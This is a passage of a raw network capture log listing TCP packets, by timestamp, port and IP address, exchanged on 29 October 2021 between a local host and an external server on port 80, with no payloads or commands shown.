Oct 29, 2021 20:50:45.257488966 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.257505894 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.257544041 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.257596016 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.338397980 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.338468075 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.338556051 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.338849068 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.338905096 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.338962078 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.338956118 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.339027882 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.339080095 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.339081049 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.339129925 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.339178085 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.339556932 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.339704037 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.339755058 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.339767933 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.340456963 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.340513945 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.340536118 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.340564013 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.340614080 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.340615988 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.340734005 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.340785980 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.340787888 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.340837002 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.340893030 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.340914011 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.340964079 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.341017008 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.341115952 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.341171026 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.341224909 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.341378927 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.341434002 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.341489077 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.341696024 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.341932058 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.341984034 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.341995001 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.342040062 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.342091084 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.342093945 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.342231035 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.342288971 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.342293978 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.342458010 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.342519999 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.342554092 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.342708111 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.342777014 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.342958927 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.343015909 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.343085051 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.343291998 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.343349934 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.343400002 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.343405008 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.343451023 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.343509912 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.343583107 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.343923092 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.343977928 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.343981028 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.344029903 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.344091892 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.344105959 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.344151974 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.344227076 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.344459057 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.344520092 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.344578028 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.344578981 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.344666958 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.344732046 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.344788074 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.344868898 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.344938993 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.345218897 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.345280886 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.345334053 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.345335007 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.345386982 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.345443010 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.352082968 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.352133989 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.352195978 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.352251053 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.352251053 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.352302074 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.352307081 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.352349043 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.352396011 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.352401972 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.352685928 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.352735043 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.352746964 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.425941944 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.425980091 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.426004887 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.426033974 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.426065922 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.427212000 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.427229881 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.427325010 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.427371979 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.427696943 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.427715063 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.427751064 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.427833080 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.427849054 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.427865982 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.427916050 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.427958012 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.428428888 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.428459883 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.428483009 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.428503990 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.428504944 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.428527117 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.428556919 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.428771019 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.428797007 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.428818941 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.428839922 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.428872108 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.429544926 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.429579020 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.429603100 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.429626942 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.429646969 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.429647923 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.429666042 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.429685116 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.429702997 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.429757118 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.429842949 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.430141926 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.430174112 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.430197001 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.430229902 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.430732965 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.430762053 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.430783987 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.430788994 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.430810928 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.430823088 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.431117058 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.431140900 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.431160927 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.431164026 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.431181908 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.431202888 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.431289911 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.431313038 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.431334019 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.431973934 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.432008028 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.432032108 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.432040930 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.432056904 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.432074070 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.432081938 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.432128906 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.432550907 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.432624102 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.432650089 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.432674885 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.432674885 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.432699919 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.432718039 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.432777882 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.432804108 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.432820082 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.433764935 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.433796883 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.433820009 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.433830976 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.433841944 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.433864117 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.433871031 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.433891058 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.433917046 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.433958054 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.433983088 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.434004068 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.434006929 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.434032917 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.434042931 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.434745073 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.434772968 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.434797049 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.434820890 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.434822083 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.434842110 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.434847116 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.434869051 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.434890032 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.435107946 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.435138941 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.435158968 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.435429096 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.435457945 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.435477972 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.435486078 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.435523987 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.435705900 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.435734034 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.435772896 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.435775042 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.435817003 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.435842037 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.435862064 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.436587095 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.436618090 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.436640024 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.436655998 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.436665058 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.436697960 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.436728001 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.436753035 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.436774969 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.439152002 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.439172029 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.439188957 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.439220905 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.439251900 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.439508915 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.515269041 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.515299082 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.515316963 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.515391111 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.515417099 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.515629053 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.515649080 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.515666008 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.515714884 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.515842915 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.515861034 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.515877008 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.515902996 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.515944958 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.515995026 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.516011000 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.516067982 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.516438961 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.516459942 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.516477108 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.516494989 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.516509056 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.516544104 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.516912937 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.516936064 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.516952038 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.517002106 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.517162085 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.517182112 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.517231941 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.517430067 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.517455101 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.517513037 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.517565012 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.517585993 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.517604113 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.517611980 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.517625093 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.517651081 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.517817020 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.517889977 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.518176079 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.518201113 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.518274069 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.518436909 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.518462896 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.518508911 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.518914938 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.518949986 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.518992901 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.519180059 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.519211054 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.519233942 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.519251108 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.519387007 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.519417048 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.519429922 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.519515038 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.519556046 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.520148993 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.520181894 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.520225048 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.520613909 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.520642996 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.520663977 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.520679951 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.520684004 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.520705938 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.520725012 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.520725965 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.520747900 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.520766973 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.520768881 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.520802021 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.562727928 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.562766075 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.562793970 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.562819958 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.562824011 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.562856913 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.562917948 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.562942028 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.562959909 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.563005924 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.601993084 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.602030039 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.602055073 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.602057934 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.602078915 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.602088928 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.602386951 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.602411032 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.602435112 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.602437973 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.602484941 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.602647066 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.602808952 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.602859974 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.602953911 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.602982044 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.603020906 CEST	49867	80	192.168.2.4	31.166.224.38
